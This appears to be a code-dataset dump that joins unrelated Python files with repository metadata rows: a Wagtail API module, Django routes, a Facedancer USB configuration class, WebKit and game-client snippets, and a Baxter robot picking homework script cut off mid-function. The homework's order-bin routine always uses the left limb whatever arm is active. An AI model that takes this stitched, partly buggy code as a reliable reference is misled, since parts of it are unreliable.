mark=s.place_marker((423.519, 544.779, 554.472), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((316.034, 429.079, 515.475), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
332a6d9bcc8114a3fcffb46b452697f41f952e04 | eee51854656ede694c121c7102cd2e737ea7e702 | /demo/api.py | 7746564cca4056932d685fcbb13988dcbb3db79d | [] | no_license | degerli/betahealth-wagtail-demo | cb99f26219fede384a44e3af5e597de40c1ab1e2 | 1cb16c2fdc877778e645bdb11ba69f6418900e26 | refs/heads/master | 2020-04-23T04:03:47.038341 | 2016-10-05T09:05:40 | 2016-10-05T09:05:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,187 | py | from django.core.urlresolvers import reverse
from rest_framework import serializers
from wagtail.api.v2.endpoints import PagesAPIEndpoint as WagtailPagesAPIEndpoint
from wagtail.api.v2.router import WagtailAPIRouter
from wagtail.wagtailimages.api.v2.endpoints import ImagesAPIEndpoint as WagtailImagesAPIEndpoint
from wagtail.wagtailimages.api.v2.serializers import ImageSerializer as WagtailImageSerializer
from wagtail.wagtailimages.utils import generate_signature
from wagtail.wagtaildocs.api.v2.endpoints import DocumentsAPIEndpoint
api_router = WagtailAPIRouter('wagtailapi')
class PagesAPIEndpoint(WagtailPagesAPIEndpoint):
meta_fields = WagtailPagesAPIEndpoint.meta_fields + [
'url_path'
]
listing_default_fields = WagtailPagesAPIEndpoint.listing_default_fields + [
'url_path'
]
def generate_image_url(image, filter_spec):
signature = generate_signature(image.id, filter_spec)
url = reverse('wagtailimages_serve', args=(signature, image.id, filter_spec))
# Append image's original filename to the URL (optional)
url += image.file.name[len('original_images/'):]
return url
class ImageSerializer(WagtailImageSerializer):
def _get_url_x(self, obj, width):
return generate_image_url(obj, 'width-{}'.format(width))
def get_url_400(self, obj):
return self._get_url_x(obj, 400)
def get_url_640(self, obj):
return self._get_url_x(obj, 640)
def get_url_800(self, obj):
return self._get_url_x(obj, 800)
def get_url_1280(self, obj):
return self._get_url_x(obj, 1280)
url_400 = serializers.SerializerMethodField()
url_640 = serializers.SerializerMethodField()
url_800 = serializers.SerializerMethodField()
url_1280 = serializers.SerializerMethodField()
class ImagesAPIEndpoint(WagtailImagesAPIEndpoint):
base_serializer_class = ImageSerializer
meta_fields = WagtailImagesAPIEndpoint.meta_fields + [
'url_400', 'url_640', 'url_800', 'url_1280'
]
api_router.register_endpoint('pages', PagesAPIEndpoint)
api_router.register_endpoint('images', ImagesAPIEndpoint)
api_router.register_endpoint('documents', DocumentsAPIEndpoint)
| [
"[email protected]"
] | |
c30d008b2918bfa5283316eabf5fe2b6a9f523b6 | d857b65117378d9f35eb062bd1d2ddbb87f11709 | /shows_app/urls.py | 53313358ebf3b9d517d23b37c79a6065b06303d1 | [] | no_license | JesusGarcia86/shows_proj | e2bd646df88e8380a6bbebebc073cd8f59520be7 | 3e6ad462d603d78241b259a6ff713e1f08b6201e | refs/heads/main | 2023-03-21T22:07:34.029715 | 2021-03-15T16:27:41 | 2021-03-15T16:27:41 | 348,043,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('shows/', views.index),
path('new', views.new),
path('shows/create', views.create),
path('<int:show_id>/edit', views.edit),
path('shows/<int:show_id>/update', views.update),
path('<int:show_id>', views.show),
path('<int:show_id>/delete', views.delete),
] | [
"[email protected]"
] | |
925d1fac6a3242c64f799762acf35762a7142c23 | 117442c662cad35375630a8a800d48f8ba53888b | /facedancer/future/configuration.py | 77a35088ccb06c6fe79ae8e8ae75c099dce011b6 | [
"BSD-3-Clause"
] | permissive | walidbarakat/Facedancer | b9a09322541dd320cadefd063888030c9eb4192e | 28d3a900179e9dd280e007026a68fbdf97e4e35a | refs/heads/master | 2023-03-06T14:05:37.479626 | 2021-02-18T02:23:53 | 2021-02-18T02:23:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,304 | py | #
# This file is part of FaceDancer.
#
""" Functionality for describing USB device configurations. """
from dataclasses import dataclass, field
from typing import Iterable
from .types import USBDirection
from .magic import instantiate_subordinates, AutoInstantiable
from .request import USBRequestHandler
from .interface import USBInterface
from .descriptor import USBDescribable
from .endpoint import USBEndpoint
@dataclass
class USBConfiguration(USBDescribable, AutoInstantiable, USBRequestHandler):
""" Class representing a USBDevice's configuration.
Fields:
number -- The configuration's number; one-indexed.
configuration_string -- A string describing the configuration; or None if not provided.
max_power -- The maximum power expected to be drawn by the device when using
this interface, in mA. Typically 500mA, for maximum possible.
supports_remote_wakeup -- True iff this device should be able to wake the host from suspend.
"""
DESCRIPTOR_TYPE_NUMBER = 0x02
DESCRIPTOR_SIZE_BYTES = 9
number : int = 1
configuration_string : str = None
max_power : int = 500
self_powered : bool = True
supports_remote_wakeup : bool = True
parent : USBDescribable = None
interfaces : USBInterface = field(default_factory=dict)
def __post_init__(self):
# Gather any interfaces defined on the object.
self.interfaces.update(instantiate_subordinates(self, USBInterface))
@property
def attributes(self):
""" Retrives the "attributes" composite word. """
# Start off with the required bits set to one...
attributes = 0b10000000
# ... and then add in our attributes.
attributes |= (1 << 6) if self.self_powered else 0
attributes |= (1 << 5) if self.supports_remote_wakeup else 0
return attributes
#
# User API.
#
def get_device(self):
""" Returns a reference to the associated device."""
return self.parent
def add_interface(self, interface: USBInterface):
""" Adds an interface to the configuration. """
self.interfaces[interface.number] = interface
interface.parent = self
def get_endpoint(self, number: int, direction: USBDirection) -> USBEndpoint:
""" Attempts to find an endpoint with the given number + direction.
Paramters:
number -- The endpoint number to look for.
direction -- Whether to look for an IN or OUT endpoint.
"""
# Search each of our interfaces for the relevant endpoint.
for interface in self.interfaces.values():
endpoint = interface.get_endpoint(number, direction)
if endpoint is not None:
return endpoint
# If none have one, return None.
return None
#
# Event handlers.
#
def handle_data_received(self, endpoint: USBEndpoint, data: bytes):
""" Handler for receipt of non-control request data.
Typically, this method will delegate any data received to the
appropriate configuration/interface/endpoint. If overridden, the
overriding function will receive all data; and can delegate it by
calling the `.handle_data_received` method on `self.configuration`.
Parameters:
endpoint -- The endpoint on which the data was received.
data -- The raw bytes received on the relevant endpoint.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.OUT):
interface.handle_data_received(endpoint, data)
return
# If no interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_received(endpoint.number, data)
def handle_data_requested(self, endpoint: USBEndpoint):
""" Handler called when the host requests data on a non-control endpoint.
Typically, this method will delegate the request to the appropriate
interface+endpoint. If overridden, the overriding function will receive
all data.
Parameters:
endpoint_number -- The endpoint number on which the host requested data.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_data_requested(endpoint)
return
# If no one interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_requested(endpoint.number)
def handle_buffer_empty(self, endpoint: USBEndpoint):
""" Handler called when a given endpoint first has an empty buffer.
Often, an empty buffer indicates an opportunity to queue data
for sending ('prime an endpoint'), but doesn't necessarily mean
that the host is planning on reading the data.
This function is called only once per buffer.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_buffer_empty(endpoint)
return
#
# Backend interface functions.
#
def get_interfaces(self) -> Iterable[USBInterface]:
""" Returns an iterable over all interfaces on the provided device. """
return self.interfaces.values()
def get_descriptor(self) -> bytes:
""" Returns this configurations's configuration descriptor, including subordinates. """
interface_descriptors = bytearray()
# FIXME: use construct
# All all subordinate descriptors together to create a big subordinate desciptor.
interfaces = sorted(self.interfaces.values(), key=lambda item: item.number)
for interface in interfaces:
interface_descriptors += interface.get_descriptor()
total_len = len(interface_descriptors) + 9
string_manager = self.get_device().strings
# Build the core interface descriptor.
d = bytes([
9, # length of descriptor in bytes
2, # descriptor type 2 == configuration
total_len & 0xff,
(total_len >> 8) & 0xff,
len(set(interface.number for interface in self.interfaces.values())),
self.number,
string_manager.get_index(self.configuration_string),
self.attributes,
self.max_power // 2
])
return d + interface_descriptors
#
# Interfacing functions for AutoInstantiable.
#
def get_identifier(self) -> int:
return self.number
#
# Backend functions for our RequestHandler class.
#
def _request_handlers(self) -> Iterable[callable]:
return ()
def _get_subordinate_handlers(self) -> Iterable[USBInterface]:
return self.interfaces.values()
| [
"[email protected]"
] | |
c4c54f309f31cc65060d382bd56bad97f492b112 | cefd6c17774b5c94240d57adccef57d9bba4a2e9 | /WebKit/Tools/Scripts/webkitpy/common/watchlist/changedlinepattern.py | 61fac9a7694e273919f37463b7d80639f9f0baa3 | [
"BSL-1.0"
] | permissive | adzhou/oragle | 9c054c25b24ff0a65cb9639bafd02aac2bcdce8b | 5442d418b87d0da161429ffa5cb83777e9b38e4d | refs/heads/master | 2022-11-01T05:04:59.368831 | 2014-03-12T15:50:08 | 2014-03-12T15:50:08 | 17,238,063 | 0 | 1 | BSL-1.0 | 2022-10-18T04:23:53 | 2014-02-27T05:39:44 | C++ | UTF-8 | Python | false | false | 1,964 | py | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class ChangedLinePattern:
def __init__(self, compile_regex, index_for_zero_value):
self._regex = compile_regex
self._index_for_zero_value = index_for_zero_value
def match(self, path, diff_file):
for diff_line in diff_file:
if diff_line[self._index_for_zero_value]:
continue
if self._regex.search(diff_line[2]):
return True
return False
| [
"[email protected]"
] | |
7b2de2370af01dcc4b23681e70b09bab35acf286 | 3c5c4c4fb296d08e9e984c4a60ae4fa147293e9a | /ceres/__init__.py | b359ff8e73e6e5bd29908753a42b11e1a2d10ffa | [
"Apache-2.0"
] | permissive | signingup/ceres-combineharvester | a8874ab11145e7ba2223b85483b96dea01054ad0 | aad918a03a4a522e0e2f3bac104d19d693d6bf79 | refs/heads/main | 2023-07-25T04:11:13.765471 | 2021-09-09T14:59:48 | 2021-09-09T14:59:48 | 404,918,382 | 1 | 0 | Apache-2.0 | 2021-09-10T01:22:20 | 2021-09-10T01:22:20 | null | UTF-8 | Python | false | false | 313 | py | from pkg_resources import DistributionNotFound, get_distribution, resource_filename
try:
__version__ = get_distribution("ceres-blockchain").version
except DistributionNotFound:
# package is not installed
__version__ = "unknown"
PYINSTALLER_SPEC_PATH = resource_filename("ceres", "pyinstaller.spec")
| [
"[email protected]"
] | |
342ff27bcaab154241f7bca43ea75b8295f3c8d7 | 46ae8264edb9098c9875d2a0a508bc071201ec8b | /res/scripts/client/gui/shared/fortificationsevents_dispatcher.py | 9b512b64b33ac34107ebb1d85b90c156e30e520c | [] | no_license | Difrex/wotsdk | 1fc6156e07e3a5302e6f78eafdea9bec4c897cfb | 510a34c67b8f4c02168a9830d23f5b00068d155b | refs/heads/master | 2021-01-01T19:12:03.592888 | 2016-10-08T12:06:04 | 2016-10-08T12:06:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # Embedded file name: scripts/client/gui/shared/fortifications/events_dispatcher.py
from gui.shared import g_eventBus, events, EVENT_BUS_SCOPE
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
def showFortBattleRoomWindow():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_BATTLE_ROOM_WINDOW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def showBattleConsumesIntro():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_COMBAT_RESERVES_INTRO_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def loadFortView():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS), EVENT_BUS_SCOPE.LOBBY) | [
"[email protected]"
] | |
988152e7a537f6c8badc344c3f79050dc23010ce | 8395ffb48750359d1bd51a201a41c7fe124998bc | /apc2015/hw4_submissions/miles_aubert/hw4.py | 669ce9e1021c1d21b63fd24460920040e18eb4a3 | [] | no_license | duke-iml/ece490-s2016 | ab6c3d3fb159a28a9c38487cdb1ad3993008b854 | f9cc992fbaadedc8a69678ba39f0c9d108e6910d | refs/heads/master | 2020-04-12T09:03:56.601000 | 2016-11-29T21:36:48 | 2016-11-29T21:36:48 | 49,226,568 | 2 | 6 | null | 2016-11-29T21:36:49 | 2016-01-07T19:42:34 | Python | UTF-8 | Python | false | false | 40,546 | py | #!/usr/bin/python
from klampt import *
from klampt.glprogram import *
from klampt import vectorops,so3,se3,gldraw,ik,loader,robotcollide
from klampt.robotsim import Geometry3D,SimBody
from baxter import *
from hw4_planner import *
import apc
import os
import math
import random
from threading import Thread,Lock
from Queue import Queue
#configuration variables
#Question 1,2,3: set NO_SIMULATION_COLLISIONS = 1
#Question 4: set NO_SIMULATION_COLLISIONS = 0
NO_SIMULATION_COLLISIONS = 1
#Set FAKE_SIMULATION to 1 to help fast prototyping of later stages.
#You won't have to wait for the arm to move.
FAKE_SIMULATION = 0
#The path of the klampt_models directory
model_dir = "../klampt_models/"
#resting configuration
baxter_rest_config = [0.0]*60
#the transformation of the order bin
order_bin_xform = (so3.identity(),[0.5,0,0])
#the local bounding box of the order bin
order_bin_bounds = ([-0.2,-0.4,0],[0.2,0.4,0.7])
class KnowledgeBase:
"""A structure containing the robot's dynamic knowledge about the world.
Members:
- bin_contents: a map from bin names to lists of known items in
the bin. Items are given by apc.ItemInBin objects.
- order_bin_contents: the list of objects already in the order bin.
also given by apc.ItemInBin objects
- shelf_xform: the transformation (rotation, translation) of the bottom
center of the shelf in world coordinates. The x coordinate increases
from left to right, the y coordinate increases from bottom to top,
and the z coordinate increases from back to front.
this will be loaded dynamically either from perception or hard coded.
(in this homework assignment we will use the fake perception module
to populate the bin contents, and assume the shelf xform is
estimated perfectly.)
"""
def __init__(self):
self.bin_contents = dict((n,None) for n in apc.bin_names)
self.order_bin_contents = []
self.shelf_xform = se3.identity()
def bin_front_center(self,bin_name):
bmin,bmax = apc.bin_bounds[bin_name]
local_center = [(bmin[0]+bmax[0])*0.5,(bmin[1]+bmax[1])*0.5,bmax[2]]
world_center = se3.apply(self.shelf_xform,local_center)
return world_center
def bin_vantage_point(self,bin_name):
world_center = self.bin_front_center(bin_name)
#20cm offset
world_offset = so3.apply(self.shelf_xform[0],[0,0,0.2])
return vectorops.add(world_center,world_offset)
def grasp_xforms(self,object):
if object.xform == None: return None
res = []
for g in object.info.grasps:
grasp_xform_world = se3.mul(object.xform,g.grasp_xform)
res.append((g,grasp_xform_world))
return res
#a list of actual items -- this is only used for the fake perception module, and your
#code should not use these items directly
ground_truth_items = []
ground_truth_shelf_xform = se3.identity()
def init_ground_truth():
global ground_truth_items
ground_truth_items = [apc.ItemInBin(apc.tall_item,'bin_B'),
apc.ItemInBin(apc.small_item,'bin_D'),
apc.ItemInBin(apc.med_item,'bin_H')]
ground_truth_items[0].set_in_bin_xform(ground_truth_shelf_xform,0.25,0.2,0.0)
ground_truth_items[1].set_in_bin_xform(ground_truth_shelf_xform,0.5,0.1,math.pi/4)
ground_truth_items[2].set_in_bin_xform(ground_truth_shelf_xform,0.6,0.4,math.pi/2)
def run_perception_on_shelf(knowledge):
"""This is a fake perception module that simply reveals the shelf
xform."""
knowledge.shelf_xform = ground_truth_shelf_xform
def run_perception_on_bin(knowledge,bin_name):
"""This is a fake perception module that simply reveals all the items
the given bin."""
global ground_truth_items
if knowledge.bin_contents[bin_name]==None:
#not sensed yet
knowledge.bin_contents[bin_name] = []
for item in ground_truth_items:
if item.bin_name == bin_name:
#place it in the bin
knowledge.bin_contents[bin_name].append(item)
return
class LowLevelController:
"""A low-level interface to the Baxter robot (with parallel jaw
grippers). Does appropriate locking for multi-threaded use.
You should use this in your picking controller."""
def __init__(self,robotModel,robotController):
self.robotModel = robotModel
self.controller = robotController
self.lock = Lock()
def getSensedConfig(self):
self.lock.acquire()
res = self.controller.getSensedConfig()
self.lock.release()
return res
def getSensedVelocity(self):
self.lock.acquire()
res = self.controller.getSensedVelocity()
self.lock.release()
return res
def getCommandedConfig(self):
self.lock.acquire()
res = self.controller.getCommandedConfig()
self.lock.release()
return res
def getCommandedVelocity(self):
self.lock.acquire()
res = self.controller.getCommandedVelocity()
self.lock.release()
return res
def setPIDCommand(self,configuration,velocity):
"""Sets the controller to a PID command mode"""
self.lock.acquire()
self.controller.setPIDCommand(configuration,velocity)
self.lock.release()
def setMilestone(self,destination,endvelocity=None):
"""Immediately sets the motion queue to move to the given
milestone. If endvelocity is given, then the end of the
queue will be moving at that velocity. Otherwise, the end
velocity will be zero."""
self.lock.acquire()
if endvelocity == None: self.controller.setMilestone(destination)
else: self.controller.setMilestone(destination,endvelocity)
self.lock.release()
def appendMilestone(self,destination,endvelocity=None):
"""Appends a milestone to the motion queue. If endvelocity
is given, then the end of the queue will be moving at that velocity.
Otherwise, the end velocity will be zero."""
self.lock.acquire()
if endvelocity == None: self.controller.appendMilestone(destination)
else: self.controller.appendMilestone(destination,endvelocity)
self.lock.release()
def isMoving(self):
return self.controller.remainingTime()>0
def remainingTime(self):
return self.controller.remainingTime()
def commandGripper(self,limb,command):
"""Sends the command to the indicated gripper.
For the parallel-jaw gripper, [0] is closed, [1] is open
Warning: don't do this while moving"""
self.lock.acquire()
q = self.controller.getCommandedConfig()
self.robotModel.setConfig(q)
value = command[0]
if limb=='left':
print "Opening left gripper to",value
self.robotModel.getDriver(15).setValue(value*0.03)
self.robotModel.getDriver(16).setValue(-value*0.03)
else:
print "Opening right gripper to",value
self.robotModel.getDriver(17).setValue(value*0.03)
self.robotModel.getDriver(18).setValue(-value*0.03)
self.controller.setMilestone(self.robotModel.getConfig())
self.lock.release()
class PickingController:
"""Maintains the robot's knowledge base and internal state. Most of
your code will go here. Members include:
- knowledge: a KnowledgeBase object
- planner: an LimbPlanner object, which *you will implement and use*
- state: either 'ready', or 'holding'
- configuration: the robot's current configuration
- active_limb: the limb currently active, either holding or viewing a state
- current_bin: the name of the bin where the camera is viewing or the gripper is located
- held_object: the held object, if one is held, or None otherwise
External modules can call viewBinAction(), graspAction(), ungraspAction(),
and placeInOrderBinAction()
"""
def __init__(self,world,robotController):
self.world = world
self.robot = world.robot(0)
self.controller = robotController
self.knowledge = KnowledgeBase()
self.planner = LimbPlanner(self.world,self.knowledge)
self.state = 'ready'
self.active_limb = None
self.active_grasp = None
self.current_bin = None
self.held_object = None
#these may be helpful
self.left_camera_link = self.robot.getLink(left_camera_link_name)
self.right_camera_link = self.robot.getLink(right_camera_link_name)
self.left_gripper_link = self.robot.getLink(left_gripper_link_name)
self.right_gripper_link = self.robot.getLink(right_gripper_link_name)
self.left_arm_links = [self.robot.getLink(i) for i in left_arm_link_names]
self.right_arm_links = [self.robot.getLink(i) for i in right_arm_link_names]
id_to_index = dict([(self.robot.getLink(i).getID(),i) for i in range(self.robot.numLinks())])
self.left_arm_indices = [id_to_index[i.getID()] for i in self.left_arm_links]
self.right_arm_indices = [id_to_index[i.getID()] for i in self.right_arm_links]
def waitForMove(self,timeout = None, pollRate = 0.5):
"""Waits for the move to complete, or timeout seconds is elapsed,
before terminating."""
iters = 0
t = 0
while self.controller.isMoving():
if iters % 10 == 0:
print "Waiting for move to complete..."
time.sleep(pollRate)
t += pollRate
if timeout != None and t > timeout:
return False
iters += 1
return True
def viewBinAction(self,b):
self.waitForMove()
if self.state != 'ready':
print "Already holding an object, can't move to bin"
return False
else:
if b in apc.bin_names:
if self.move_camera_to_bin(b):
self.waitForMove()
self.current_bin = b
run_perception_on_bin(self.knowledge,b)
print "Sensed bin",b,"with camera",self.active_limb
else:
print "Move to bin",b,"failed"
return False
else:
print "Invalid bin",b
return False
return True
def graspAction(self):
self.waitForMove()
self.controller.commandGripper(self.active_limb,[1])
self.waitForMove()
if self.current_bin == None:
print "Not located at a bin"
return False
elif self.state != 'ready':
print "Already holding an object, can't grasp another"
return False
elif len(self.knowledge.bin_contents[self.current_bin])==0:
print "The current bin is empty"
return False
else:
if self.move_to_grasp_object(self.knowledge.bin_contents[self.current_bin][0]):
self.waitForMove()
#now close the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_close_command)
self.waitForMove()
self.held_object = self.knowledge.bin_contents[self.current_bin].pop(0)
self.state = 'holding'
print "Holding object",self.held_object.info.name,"in hand",self.active_limb
return True
else:
print "Grasp failed"
return False
def ungraspAction(self):
self.waitForMove()
if self.state != 'holding':
print "Not holding an object"
return False
else:
if self.move_to_ungrasp_object(self.held_object):
self.waitForMove()
#now open the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_open_command)
self.waitForMove()
print "Object",self.held_object.info.name,"placed back in bin"
self.knowledge.bin_contents[self.current_bin].append(self.held_object)
self.state = 'ready'
self.held_object = None
return True
else:
print "Ungrasp failed"
return False
def placeInOrderBinAction(self):
self.waitForMove()
if self.state != 'holding':
print "Not holding an object"
else:
if self.move_to_order_bin(self.held_object):
self.waitForMove()
#now open the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_open_command)
self.waitForMove()
print "Successfully placed",self.held_object.info.name,"into order bin"
self.knowledge.order_bin_contents.append(self.held_object)
self.held_object.xform = None
self.held_object.bin_name = 'order_bin'
self.state = 'ready'
self.held_object = None
return True
else:
print "Move to order bin failed"
return False
def fulfillOrderAction(self,objectList):
"""Given a list of objects to be put in the order bin, run
until completed."""
remainingObjects = objectList
for b in apc.bin_names:
if self.knowledge.bin_contents[b]==None:
if not self.viewBinAction(b):
print "Could not view bin",b
continue
donextbin = False
while any(o.info.name in remainingObjects for o in self.knowledge.bin_contents[b]) and not donextbin:
#pick up and put down objects until you are holding one that is in the remainingObjects list
if not self.graspAction():
print "Error grasping object"
donextbin = True
break
while not donextbin and (self.held_object == None or self.held_object.info.name not in remainingObjects):
#cycle through objects by putting down and picking up the next object
if not self.ungraspAction():
print "Error putting down object"
return False
if not self.graspAction():
print "Error grasping object"
donextbin = True
break
obj = self.held_object
if self.placeInOrderBinAction():
remainingObjects.remove(obj.info.name)
else:
print "Error putting object into order bin"
return False
if len(remainingObjects)==0:
return True
print "These items are remaining from the order:",remainingObjects
return False
def randomize_limb_position(self,limb,range=None):
"""Helper: randomizes the limb configuration in self.robot.
limb can be 'left' or 'right'. If range is provided, then
this samples in a range around the current commanded config"""
qmin,qmax = self.robot.getJointLimits()
if range == None:
q = baxter_rest_config[:]
if limb == 'left':
for j in self.left_arm_indices:
q[j] = random.uniform(qmin[j],qmax[j])
else:
for j in self.right_arm_indices:
q[j] = random.uniform(qmin[j],qmax[j])
self.robot.setConfig(q)
else:
q = self.controller.getCommandedConfig()
if limb == 'left':
for j in self.left_arm_indices:
q[j] = max(qmin[j],min(qmax[j],random.uniform(q[j]-range,q[j]+range)))
else:
for j in self.right_arm_indices:
q[j] = max(qmin[j],min(qmax[j],random.uniform(q[j]-range,q[j]+range)))
self.robot.setConfig(q)
return
def move_camera_to_bin(self,bin_name):
"""Starts a motion so the camera has a viewpoint that
observes bin_name. Will also change self.active_limb to the
appropriate limb.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
world_offset = self.knowledge.bin_vantage_point(bin_name)
#place +z in the +x axis, y in the +z axis, and x in the -y axis
left_goal = ik.objective(self.left_camera_link,R=[0,0,-1,1,0,0,0,1,0],t=world_offset)
right_goal = ik.objective(self.right_camera_link,R=[0,0,-1,1,0,0,0,1,0],t=world_offset)
qcmd = self.controller.getCommandedConfig()
for i in range(100):
if random.random() < 0.5:
if i == 0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position('left')
if ik.solve(left_goal):
if self.planner.check_collision_free('left'):
self.controller.setMilestone(self.robot.getConfig())
self.active_limb = 'left'
return True
else:
if i == 0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position('right')
if ik.solve(right_goal):
if self.planner.check_collision_free('right'):
self.controller.setMilestone(self.robot.getConfig())
self.active_limb = 'right'
return True
return False
def move_to_grasp_object(self,object):
"""Sets the robot's configuration so the gripper grasps object at
one of its potential grasp locations. Might change self.active_limb
to the appropriate limb. Must change self.active_grasp to the
selected grasp.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
grasps = self.knowledge.grasp_xforms(object)
qmin,qmax = self.robot.getJointLimits()
qcmd = self.controller.getCommandedConfig()
#phase 1: init IK from the commanded config, search among grasps
for (grasp,gxform) in grasps:
if self.active_limb == 'left':
Tg = se3.mul(gxform,se3.inv(left_gripper_center_xform))
goal = ik.objective(self.left_gripper_link,R=Tg[0],t=Tg[1])
else:
Tg = se3.mul(gxform,se3.inv(right_gripper_center_xform))
goal = ik.objective(self.right_gripper_link,R=Tg[0],t=Tg[1])
self.robot.setConfig(qcmd)
if ik.solve(goal):
self.controller.setMilestone(self.robot.getConfig())
self.active_grasp = grasp
return True
#Phase 2: that didn't work, now try random sampling
for i in range(100):
#pick a config at random
self.randomize_limb_position(self.active_limb)
#pick a grasp at random
(grasp,gxform) = random.choice(grasps)
if self.active_limb == 'left':
Tg = se3.mul(gxform,se3.inv(left_gripper_center_xform))
goal = ik.objective(self.left_gripper_link,R=Tg[0],t=Tg[1])
else:
Tg = se3.mul(gxform,se3.inv(right_gripper_center_xform))
goal = ik.objective(self.right_gripper_link,R=Tg[0],t=Tg[1])
if ik.solve(goal):
self.active_grasp = grasp
#TODO: plan a path
self.controller.setMilestone(self.robot.getConfig())
return True
return False
def move_to_ungrasp_object(self,object):
"""Sets the robot's configuration so the gripper ungrasps the object.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
assert len(object.info.grasps) > 0,"Object doesn't define any grasps"
return True
def move_to_order_bin(self,object):
"""Sets the robot's configuration so the gripper is over the order bin
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
left_target = se3.apply(order_bin_xform,[0.0,0.2,order_bin_bounds[1][2]+0.1])
right_target = se3.apply(order_bin_xform,[0.0,-0.2,order_bin_bounds[1][2]+0.1])
qcmd = self.controller.getCommandedConfig()
for i in range(100):
if self.active_limb == 'left':
goal = ik.objective(self.left_gripper_link,local=left_gripper_center_xform[1],world=left_target)
else:
goal = ik.objective(self.right_gripper_link,local=right_gripper_center_xform[1],world=right_target)
#set IK solver initial configuration
if i==0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position(self.active_limb)
#solve
if ik.solve(goal,tol=0.1):
if self.planner.check_collision_free('left'):
self.controller.setMilestone(self.robot.getConfig())
self.active_limb = 'left'
return True
return False
def draw_xformed(xform,localDrawFunc):
"""Draws something given a se3 transformation and a drawing function
that draws the object in its local frame.
E.g., draw_xformed(xform,lambda:gldraw.box([ax,ay,az],[bx,by,bz])) draws
a box oriented and translated by xform."""
mat = zip(*se3.homogeneous(xform))
mat = sum([list(coli) for coli in mat],[])
glPushMatrix()
glMultMatrixf(mat)
localDrawFunc()
glPopMatrix()
def draw_oriented_box(xform,bmin,bmax):
"""Helper: draws an oriented box"""
draw_xformed(xform,lambda:gldraw.box(bmin,bmax))
def draw_wire_box(bmin,bmax):
"""Helper: draws a wireframe box"""
glBegin(GL_LINE_LOOP)
glVertex3f(bmin[0],bmin[1],bmin[2])
glVertex3f(bmin[0],bmin[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmin[2])
glEnd()
glBegin(GL_LINE_LOOP)
glVertex3f(bmax[0],bmin[1],bmin[2])
glVertex3f(bmax[0],bmin[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmin[2])
glEnd()
glBegin(GL_LINES)
glVertex3f(bmin[0],bmin[1],bmin[2])
glVertex3f(bmax[0],bmin[1],bmin[2])
glVertex3f(bmin[0],bmin[1],bmax[2])
glVertex3f(bmax[0],bmin[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmax[2])
glVertex3f(bmax[0],bmax[1],bmax[2])
glVertex3f(bmin[0],bmax[1],bmin[2])
